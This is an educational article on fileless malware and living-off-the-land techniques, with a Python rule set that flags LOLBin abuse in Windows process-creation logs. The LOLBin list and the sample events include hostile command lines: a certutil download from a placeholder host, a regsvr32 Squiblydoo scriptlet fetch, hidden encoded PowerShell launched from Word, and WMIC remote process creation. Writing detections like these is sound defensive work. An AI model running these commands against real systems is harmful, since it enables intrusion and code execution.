Fileless Malware and Living-off-the-Land Attacks
Learn how fileless malware abuses legitimate tools (PowerShell, WMI, macros) to evade traditional signature-based detection.
Why Fileless Attacks Are So Effective
Traditional malware writes an executable to disk, which gives signature-based antivirus a file to scan and match. Fileless malware instead runs entirely in memory, or abuses tools that are already installed, so there is no malicious binary on disk for a scanner to hash. This sharply lowers detection rates for signature-based tooling; a widely cited 2017 Ponemon Institute endpoint-security survey estimated that fileless attacks are roughly ten times more likely to succeed than file-based ones. The 2016 Bangladesh Bank heist (malware that patched the SWIFT client's validation checks in memory), the 2017 NotPetya outbreak (which spread laterally with WMIC and PsExec alongside its SMB exploit) and many nation-state intrusions have used fileless and living-off-the-land techniques to persist and evade detection. Note that "fileless" rarely means no file at all: a malicious document, a registry value holding encoded script, or a scheduled task is usually still present; what is missing is a standalone malicious executable.
Living-off-the-Land (LotL) Techniques
Living-off-the-land (LotL) attacks use legitimate tools and utilities already present on the victim system to carry out malicious actions. These tools (PowerShell, WMI, certutil, mshta, regsvr32, rundll32) ship with Windows, are signed by Microsoft and have real administrative uses, so allow-listing and reputation-based controls treat them as trusted. An attacker who uses only built-in tools blends into ordinary administrative activity and leaves no custom binary to hash or signature. The defender's problem is therefore not "is this binary bad?" but "is this invocation of a good binary bad?", and the answer lies in context: the command line, the parent process, the user and host, and the time of day. That is why behavioral analytics and contextual detection (process-creation telemetry with full command lines, PowerShell script block logging, AMSI) outperform signatures against LotL tradecraft.
# Common LOLBins (Living Off the Land Binaries):
# certutil.exe   - download files (-urlcache -split -f <url>) and decode base64 payloads (-decode)
# mshta.exe      - execute HTA (HTML Application) scripts, including from a remote URL
# regsvr32.exe   - load a remote scriptlet via /i:<url> scrobj.dll ("Squiblydoo"), a classic AppLocker bypass
# rundll32.exe   - call DLL exports, or run inline JavaScript through mshtml
# wmic.exe       - WMI queries and remote process creation for lateral movement (deprecated in current Windows builds)
# bitsadmin.exe  - download/upload via the BITS service
# powershell.exe - near-unlimited capability: download cradles, encoded commands, in-memory .NET loading
# cmstp.exe      - load an INF file that runs scriptlets, a known UAC bypass
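The detection point above is easier to see in code. The following Python rule set is an added example, not code from the original page or from any vendor product: it applies the "behavioral and contextual" idea to process-creation records whose fields mirror Sysmon Event ID 1 or Security event 4688 (image, command line, parent image). Each rule keys on the argument shape that has no routine administrative use, and one contextual rule keys on the parent process rather than the arguments. The rule names, the regexes and all sample events are constructed for illustration; 203.0.113.10 is a documentation address.

```python
"""Behavioral triage of process-creation events for LOLBin abuse.

Added example, not code from the original page. Event fields mirror
Sysmon Event ID 1 / Security 4688. All sample events are constructed.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcessEvent:
    image: str         # full path of the executable that started
    command_line: str  # its command line, as logged
    parent_image: str  # full path of the parent process


# Hypothetical rule set: (rule name, executable, regex over the command line).
# Each pattern targets an argument shape that routine admin use does not
# produce, so ordinary use of the same tool stays quiet.
LOLBIN_RULES = [
    ("certutil-download",        "certutil.exe", r"-urlcache\b.*\b(?:https?|ftp)://"),
    ("mshta-remote-or-inline",   "mshta.exe",    r"https?://|javascript:|vbscript:"),
    ("regsvr32-squiblydoo",      "regsvr32.exe", r"/i:\S*https?://"),
    ("rundll32-inline-script",   "rundll32.exe", r"javascript:|vbscript:|\bmshtml\b"),
    ("bitsadmin-transfer",       "bitsadmin.exe", r"/(?:transfer|addfile)\b"),
    ("wmic-remote-exec",         "wmic.exe",     r"/node:\S+.*\bprocess\s+call\s+create\b"),
    # cmstp is rare on workstations; any INF load is worth a look (assumption).
    ("cmstp-inf",                "cmstp.exe",    r"\.inf\b"),
    # -e / -ec / -enc / -EncodedCommand followed by a long base64 blob.
    ("powershell-encoded",       "powershell.exe",
     r"(?:^|\s)[-/]e[a-z]*\s+[A-Za-z0-9+/=]{16,}"),
    # A download primitive and an execution primitive in the same command line.
    ("powershell-download-cradle", "powershell.exe",
     r"(?=.*(?:DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient))"
     r"(?=.*(?:\bIEX\b|Invoke-Expression))"),
]

# Parent/child context: an Office application spawning a script host is the
# classic macro-delivery shape and is suspicious regardless of the arguments.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe"}


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path (ntpath works on any host OS)."""
    return ntpath.basename(path).lower()


def detect(event: ProcessEvent) -> List[str]:
    """Return the names of every rule the event trips; [] means unremarkable."""
    image, parent = _base(event.image), _base(event.parent_image)
    hits = [name for name, binary, pattern in LOLBIN_RULES
            if image == binary and re.search(pattern, event.command_line, re.I)]
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office-spawns-script-host")
    return hits


def triage(events: List[ProcessEvent]) -> Dict[int, List[str]]:
    """Map event index -> matched rules, keeping only events that matched."""
    flagged: Dict[int, List[str]] = {}
    for i, ev in enumerate(events):
        hits = detect(ev)
        if hits:
            flagged[i] = hits
    return flagged


# Constructed sample telemetry (not from a real host).
SAMPLE_EVENTS = [
    # 0: benign certutil use (listing the user's certificate store)
    ProcessEvent(r"C:\Windows\System32\certutil.exe", "certutil -store My",
                 r"C:\Windows\System32\cmd.exe"),
    # 1: certutil used as a download cradle
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 r"certutil -urlcache -split -f http://203.0.113.10/a.txt C:\Users\Public\a.txt",
                 r"C:\Windows\System32\cmd.exe"),
    # 2: Squiblydoo: regsvr32 pulls a scriptlet over HTTP
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 "regsvr32 /s /n /u /i:http://203.0.113.10/p.sct scrobj.dll",
                 r"C:\Windows\explorer.exe"),
    # 3: Word macro launching hidden, encoded PowerShell
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    # 4: benign scheduled backup script (policy bypass alone is not a hit)
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
                 r"C:\Windows\System32\svchost.exe"),
    # 5: WMIC used for remote process creation (lateral movement)
    ProcessEvent(r"C:\Windows\System32\wbem\WMIC.exe",
                 r'wmic /node:10.0.0.5 /user:corp\admin process call create "cmd /c whoami"',
                 r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for idx, rules in triage(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}  <- {SAMPLE_EVENTS[idx].command_line}")
```

Events 0 and 4 are deliberately ordinary invocations of the same binaries the attacker abuses; a rule that simply alerted on `certutil.exe` or on `-ExecutionPolicy Bypass` would page the on-call engineer for every admin. The macro case (event 3) is caught twice, once on the encoded command line and once on the Word parent, which is the kind of corroboration that lets a SOC raise the severity of a single event.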